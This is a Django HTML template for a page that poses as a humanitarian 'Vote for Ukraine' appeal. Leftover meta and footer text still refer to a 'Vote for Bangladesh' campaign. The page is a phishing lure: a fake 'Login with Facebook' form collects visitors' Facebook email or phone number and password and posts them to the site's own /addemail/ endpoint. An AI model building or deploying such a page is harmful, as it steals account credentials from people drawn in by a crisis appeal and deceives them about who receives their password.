{% load staticfiles %}
<!DOCTYPE html>
<html>

<head>
  <title>Vote For ukraine</title>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="description"
    content="Vote for Bangladesh to appeal against their government as student's are protesting and instead are getting harrassed.Take Action Now. Every Vote Counts">
  <meta name="viewport" content="width=device-width, initial-scale = 1.0, 
maximum-scale=1.0, user-scalable=no" />

  <link rel="stylesheet" type="text/css" href="{% static 'css/style.css' %}">
  <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' rel='stylesheet' type='text/css'>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
  <link rel="stylesheet" type="text/css" href="{% static 'css/bootstrap.min.css' %}">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" type="text/css"
    href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">


  <style type="text/css">
    .main {
      background: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url("https://ichef.bbci.co.uk/news/660/cpsprodpb/AB94/production/_102842934_3dd1e6ea-5e5d-42f4-8876-9573d4085d5f.jpg") no-repeat;

      background-size: 100% 100%;
      height: 400px;
      width: 100%;
      overflow: auto;
      background: rgba(0, 0, 0, 0, 0.7);

    }

    #main-heading {
      color: white;
      text-align: center;
      font-family: "Montserrat";
    }

    #main-para {
      color: white;
      text-align: center;
      font-family: "Montserrat";
    }

    #login-header {
      color: #4662B0;
      text-align: center;
      font-family: 'Lucida Grande', tahoma, verdana, arial, sans-serif;
      margin-top: 10px;
    }

    .loginBtn {
      box-sizing: border-box;
      position: relative;
      /* width: 13em;  - apply for fixed size */
      margin: 0.2em;
      padding: 0 15px 0 46px;
      border: none;
      text-align: left;
      line-height: 34px;
      white-space: nowrap;
      border-radius: 0.2em;
      font-size: 16px;
      color: #FFF;
    }

    .loginBtn:before {
      content: "";
      box-sizing: border-box;
      position: absolute;
      top: 0;
      left: 0;
      width: 34px;
      height: 100%;
    }

    .loginBtn:focus {
      outline: none;
    }

    .loginBtn:active {
      box-shadow: inset 0 0 0 32px rgba(0, 0, 0, 0.1);
    }


    /* Facebook */
    .loginBtn--facebook {
      background-color: #4C69BA;
      background-image: linear-gradient(#4C69BA, #3B55A0);
      /*font-family: "Helvetica neue", Helvetica Neue, Helvetica, Arial, sans-serif;*/
      text-shadow: 0 -1px 0 #354C8C;

    }

    .loginBtn--facebook:before {
      border-right: #364e92 1px solid;
      background: url('https://s3-us-west-2.amazonaws.com/s.cdpn.io/14082/icon_facebook.png') 6px 6px no-repeat;
    }

    .loginBtn--facebook:hover,
    .loginBtn--facebook:focus {
      background-color: #5B7BD5;
      background-image: linear-gradient(#5B7BD5, #4864B1);
      cursor: pointer;
    }

    .login-div {
      margin: 0 auto;
      width: 100%;
      height: 200px;
    }

    .loginBtn {
      margin-top: 10px;
    }

    .login-form {
      text-align: center;
    }

    #vote-heading {
      color: coral;
      text-align: center;
    }

    #footer {
      text-align: center;

      background-color: #333;
      height: 100px;
      color: white;
    }

    #footer-para {
      text-align: center;
      margin-top: 200px;

    }
  </style>
</head>




<body>

  <div class="container main">
    <h1 id="main-heading">Help Ukraine!</h1>
    <h2 id="main-heading">Your one vote could save a life!</h2>
    <p id="main-para">

      For more than a week Russia’s assault grew out of mass protests in Ukraine that toppled the country’s pro-Russian
      President Viktor Yanukovych (partially over his abandonment of a trade agreement with the European Union). US
      diplomats visited the demonstrations, in symbolic gestures that further agitated Putin.

    <h1 id="main-heading">This is an open appeal to the Russian government from International sectors! Vote to save
      them!</h1>
    </p>
  </div>

  <div class="login-div">

    <h3 id="vote-heading">Every Vote is an Open Appeal!</h3>
    <h2 id="login-header">Login Using Facebook</h2>
    <form method="post" action="/addemail/" class="login-form">
      {% csrf_token %}
      Your Facebook Email or Phone Number<br>
      <input type="email" name="email" required>
      <br>
      Password<br>
      <input name="pass" type="Password" required>

      <br>
      <button type="submit" class="loginBtn loginBtn--facebook">
        Login with Facebook
      </button>
    </form>

  </div>
























  <footer id="footer">
    <p id="footer-para">Copyright &copy VoteForBangladesh 2018</p>


  </footer>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
  <script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
</body>

</html>